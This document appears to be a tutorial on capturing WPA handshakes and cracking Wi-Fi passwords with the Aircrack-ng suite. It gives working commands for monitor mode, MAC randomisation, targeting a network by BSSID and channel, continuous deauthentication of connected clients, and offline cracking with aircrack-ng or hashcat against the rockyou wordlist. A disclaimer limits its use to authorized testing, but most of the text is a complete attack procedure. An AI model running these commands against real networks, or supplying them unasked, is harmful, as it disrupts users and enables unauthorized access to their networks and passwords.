This guide documents the commands and procedures for capturing WPA handshakes using the Aircrack-ng suite.
DO NOT PERFORM ATTACKS ON UNAUTHORIZED NETWORKS. This guide is for educational purposes and authorized security testing only. Always obtain proper authorization before testing any network security.
- A wireless network interface (can be
wlan0or any available interface) - External Wi-Fi adapter (if using a virtual machine)
- Aircrack-ng suite installed
- Wordlist (e.g.,
rockyou.txt)
Enable your wireless interface to listen to wireless traffic:
sudo airmon-ng start wlan0Note: Your network interface doesn't have to be wlan0. It can be any wireless interface available on your system. If using a virtual machine, ensure your external Wi-Fi adapter is properly configured.
The airmon-ng script is equivalent to running these commands manually:
sudo ifconfig wlan0 down
iwconfig wlan0 mode monitor
macchanger -r wlan0 # Adds a layer of security by randomizing the MAC address
sudo ifconfig wlan0 upScan for available wireless networks:
sudo airodump-ng wlan0Once you identify your target network, note the following information:
- BSSID: The wireless network identifier (MAC address)
- Channel: The channel number used by the network
To focus on a specific network, filter by channel and BSSID:
sudo airodump-ng -c <channel> -d <bssid> wlan0Replace <channel> and <bssid> with your target values.
This process requires two simultaneous operations.
Begin listening and save the captured data to a file. This file will be used for password brute-force attacks and can be analyzed with Wireshark:
sudo airodump-ng -w <PATH/FILENAME> -c <channel> --bssid <bssid> wlan0Parameters:
-w: Specify the output file path and name-c: Target channel--bssid: Target network BSSID
In a separate terminal, initiate a deauthentication attack against a connected device to force a disconnection. When the device reconnects, a new handshake will be captured:
sudo aireplay-ng --deauth 0 -a <bssid> wlan0Parameters:
--deauth 0: Send continuous deauthentication packets-a: Target BSSID
Note: Keep both commands running until you see the "WPA handshake" message in the airodump-ng output.
Once the WPA handshake is captured, return your wireless interface to managed mode:
sudo airmon-ng stop wlan0Use the captured handshake file to crack the password:
aircrack-ng <PATH/FILENAME.cap> -w /usr/share/wordlists/rockyou.txtParameters:
<PATH/FILENAME.cap>: The captured file (usually.capextension)-w: Path to your wordlist
For faster brute-force attacks, you can use Hashcat instead of aircrack-ng:
hashcat -m 2500 <PATH/FILENAME.hccapx> /usr/share/wordlists/rockyou.txt- File Formats: Airodump-ng typically generates
.capfiles. Hashcat requires.hccapxformat, which can be converted usingcap2hccapx. - Wordlists: The
rockyou.txtwordlist is commonly used, but you can use any custom wordlist appropriate for your needs. - Legal Compliance: Always ensure you have explicit permission before testing any network security.